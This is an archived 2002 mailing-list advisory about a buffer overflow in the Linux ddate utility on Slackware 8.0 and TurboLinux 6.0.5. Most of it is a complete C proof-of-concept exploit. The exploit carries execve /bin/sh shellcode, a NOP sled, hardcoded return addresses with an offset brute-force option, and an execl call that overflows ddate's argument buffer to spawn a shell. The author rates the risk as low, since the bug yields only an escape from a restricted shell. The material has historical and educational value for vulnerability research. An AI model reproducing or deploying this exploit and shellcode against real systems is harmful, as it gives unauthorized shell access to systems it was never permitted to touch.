===============================================================================
[-] Ddate
[-] Risk: Low. User can obtain an Normal (SH)ell, the user can
leave a Restricted Shell an obtain an unrestricted shell
[-] Date: 30 March of 2002
[-] Author: Costantino Leandro
[-] Vulnerables: Slackware 8.0
TurboLinux 6.0.5
Maybe other Distros (test it)
[-] e-mail: le_costantinoat_private
===============================================================================
1) Intro
2) Advisorie/Bug
3) Exploit
--------------------
1 Intro
--------------------
ddate is a program installed by default, on a lot of Linux Distros. Its
convert Gregorian Dates to Discordian Dates.
--------------------
2 Adv/Bug
--------------------
The program dont check the variable length if we use a sintax like this>
ddate +[STRING >420 Size] , make a Segmention Fault.
on Slackwawre 8.0 a size bigger than 420 will overwrite the EIP, so we can
execute commands.
On Turbolinux 6.0.5 the buffer is 5 bytes less, with 415 we will overwrite
the EIP.
----------------------
3 Exploit
----------------------
/* /usr/bin/ddate Xploit , Proof of Concept
Os: Linux - Most Distros, this xploit is best working with Slackware 8.0 and
TurboLinux 6.0.5, but you may try on another distros if you
get the Ret Address, or do a Offset brute force.
Author: Costantino Leandro le_costantinoat_private
Risk: Low, is not suid, user can leave an restricted shell and obtain a
'new' sh shell.
Date: 30/03/2001
*/
#include <stdlib.h>
//Buffer Size 420 + 100 (100 more to have more chance to exploit it)
#define buffer_size 520
//On Turbolinux buffersize is 515
#define turbo_size 515
//This are the possibles RET address i found to exploit it */
//Sometimes you will use RET1, sometimes RET2, etc.
//
#define RET 0xbfffe5ed /*On Slackware 8.0 */
#define RET2 0xbfffd477
#define RET3 0xbffff9ac
#define RET4 0xbffff64d
//For TurboLinux 6.0.5, possibles RET addrees to exploit it
//
#define RET5 0x7ffffb74
#define RET6 0x7ffffba1
#define RET7 0x7ffffb6a
#define RET8 0x7ffffb4c
#define doffset 0
#define NOP 0x90
char operador[]='+';
unsigned long get_sp(void)
{
__asm__('movl %esp,%eax');
}
char shellcode[] =
'\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b'
'\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd'
'\x80\xe8\xdc\xff\xff\xff/bin/sh';
void help()
{
printf('#####################################################\n');
printf('DDATE Xploit (Slackware 8.0/TurboLinux 6.0.5)\n');
printf('--------------------------------------------------\n');
printf('Use: ./dxploit RET-Selection Offset (default 0)\n');
printf('--------------------------------------------------\n');
printf('RET-Selection:
Slackware 8.0 Turbolinux 6.0.5
1 0xbfffe5ed 5 0x7ffffb74
2 0xbfffd477 6 0x7ffffba1
3 0xbffff9ac 7 0x7ffffb6a
4 0xbffff64d 8 0x7ffffb4c
0 Get current address (for other distros) use with differents offsets\n');
printf('###########################################################\n\n');
exit(1);
}
main(int argc, char *argv[])
{
int offset = doffset;
int bsize = buffer_size;
long *pointer_addr;
long address;
char *data_string,*point;
char codex[bsize + 1];
int elejido;
int i;
memset(codex,0x00,sizeof(codex));
if(argc>1) { elejido = atoi(argv[1]) ;
}
else {
help();
}
if(argc>2) { offset=atoi(argv[2]);
}
switch(elejido)
{
case 0:
address = get_sp() - offset;
case 1:
address = RET - offset;
break;;
case 2:
address = RET2 - offset;
break;;
case 3:
address = RET3 - offset;
break;;
case 4:
address = RET4 - offset;
break;;
//Turbolinux Address
case 5:
address = RET5 - offset;
break;;
case 6:
address = RET6 - offset;
break;;
case 7:
address = RET7 - offset;
break;;
case 8:
address = RET8 - offset;
break;;
default:
help();
printf('Error: Not a Valide Ret Selection, must be 1 to 8\n');
exit(1);
}
//Change the buffer size if TurboLinux Address Selected
if(elejido >=5 )
{
bsize=turbo_size;
}
if(!(data_string=malloc(bsize))){
printf('cannot allocate memory\n');
exit(1);
}
printf('########################################\n');
printf('DDATE Xploit (Slackware 8.0)\n');
printf('Using address= %x\n',address);
printf('Offset = %d\n',offset);
printf('Type ./dxploit for help\n');
printf('########################################\n\n');
point = data_string;
pointer_addr = (long *)point;
for(i=0;i < bsize ; i+=4)
*(pointer_addr++) = address;
for(i=0; i < bsize/2; i++)
data_string[i] = NOP;
point = data_string + ((bsize/2) - (strlen(shellcode)/2));
for(i=0;i < strlen(shellcode); i++)
*(point++) = shellcode[i];
data_string[bsize - 1] = '\0';
//We need to execute the args +data_string, so i concatenate the '+' and the
//data_string on codex variable
strcat(codex,operador);
strcat(codex,data_string);
// Same as ddate +[string]
execl('/usr/bin/ddate','ddate',codex,0);
}
__________________________________________________
Todavía no tenés tu Ciudad Internet Mail? Obtenelo ahora! - http://webmail.ciudad.com.ar
Descargá Gratis el nuevo Internet Explorer 6.0, el mejor software para actualizar tu PC.
http://www.ciudad.com.ar/ar/servicios/ie/
This archive was generated by hypermail 2b30 : Wed Apr 17 2002 - 09:31:41 PDT